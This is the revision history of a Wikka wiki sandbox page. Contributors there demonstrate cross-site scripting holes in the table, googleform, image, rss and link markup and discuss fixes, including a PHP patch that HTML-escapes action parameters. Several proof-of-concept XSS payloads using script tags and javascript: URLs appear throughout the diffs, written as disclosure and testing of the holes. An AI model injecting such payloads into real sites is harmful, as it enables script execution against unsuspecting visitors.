Revision history for MySandbox
Revision [19443]
Last edited on 2008-01-28 00:16:02 by JavaWoman [Modified links pointing to docs server] No Differences
Revision [17834]
Edited on 2007-12-12 13:14:37 by JavaWoman [prevent function references looking as page links]Additions:
I just patched up the actions to feed the appropriate items through ""ReturnSafeHTML()"".
Deletions:
Additions:
for ($a = 0; $a < count($matches[0]); $a++) {
Deletions:
Additions:
for ($a = 0; $a < count($matches[0]); $a ) {
Deletions:
Additions:
**attention:** this hack may confuse some actions which aren't aware that the parameters are now passed as HTML entities! It may be sufficient to treat only the occurrence of single quotes, since this is the point where the first two of Roman's exploits hook in.
Hey Dreck, I do have a request.
although the problem is solved, moved the stuff to CachingRSS and added some remarks
thanks ;) and (of course) thanks for the hint! --DreckFehler
Deletions:
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
Update: Nevermind the plea. I'm going to use PHP's parse_url().
test test2
Additions:
Good work, guys =)
-- RomanIvanov
Additions:
test test2
Deletions:
Additions:
test
Additions:
Update: Nevermind the plea. I'm going to use PHP's parse_url().
Additions:
----
Yeah, that Roman guy is a big trouble-maker. ;)
I just patched up the actions to feed the appropriate items through ReturnSafeHTML().
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
Additions:
''Fixed in Wikka 1.1.3.8 -- JsnX''
Additions:
Any suggestions on how to address this issue?
Here is mine (which doesn't fix the rss-exploit, but I seem to have some more general problems with the rss-action in my wikka-installation, and this exploit isn't located in the parameter-handling; it has to be handled in the rss-action itself):
%%(php)<?php
// $matches holds the name/value pairs parsed out of the action's parameter string:
// $matches[1] are the parameter names, $matches[2] the raw values.
if (is_array($matches)) {
    for ($a = 0; $a < count($matches[0]); $a++) {
        // ENT_QUOTES escapes both quote styles as well as <, > and &, so a value
        // can no longer break out of the attribute an action puts it into.
        $vars[$matches[1][$a]] = htmlentities($matches[2][$a], ENT_QUOTES);
    }
}
// $vars_temp is the complete raw parameter string the action was called with.
$vars["wakka_vars"] = htmlentities(trim($vars_temp), ENT_QUOTES);
?>%%
**attention:** this hack may confuse some actions which aren't aware that the parameters are now passed as HTML entities! It may be sufficient to treat only the occurrence of single quotes, since this is the point where the first two of Iwan's exploits hook in.
I hate those guys who cause problems but omit the solutions ;)
Additions:
====rss action has an XSS and is also supposedly unsafe because any malefactor can generate a BIG amount of incoming traffic, which may be expensive.====
Deletions:
Additions:
{{rss url="http://ar.sky.ru/xss.xml" cache="cachef.xml"}}
Deletions:
Additions:
Hmm.
{{rss url="http://ar.sky.ru/txt/export.xml" cache="cachefilename.xml"}}
Additions:
====table action has an XSS.====
====googleform action has an XSS.====
Deletions:
Additions:
table action has an XSS.
{{googleform q="'><script>alert(2)</script>"}}
Additions:
{{table cellpadding="'><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
Additions:
{{table cellpadding="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
Additions:
{{table cellspacing="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
Additions:
{{table cellspacing="><script>alert(1);</script>"}}
Deletions:
Seems to be an XSS security hole.
// Fixed. 5/8/04 - JsnX//
It's not the last XSS bug here.
// Do you still see others? 5/8/04 - JsnX//
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.
Deletions:
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]
Additions:
[[javascript:alert(1)]]
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]
Additions:
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.
Deletions:
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar
Additions:
~-autoindent
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar
Additions:
// Fixed. 5/8/04 - JsnX//
// Do you still see others? 5/8/04 - JsnX//
Additions:
{{image url="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvdvideo.gif" alt="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvdvideo.gif" class="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvdvideo.gif" title="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images/dvd.gif" title="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images\dvd.gif" title="javascript:alert('1')"}}
Deletions:
Additions:
{{image url="images\dvd" title="javascript:alert('1')"}}
Deletions:
Additions:
It's not the last XSS bug here.
Additions:
Seems to be an XSS security hole.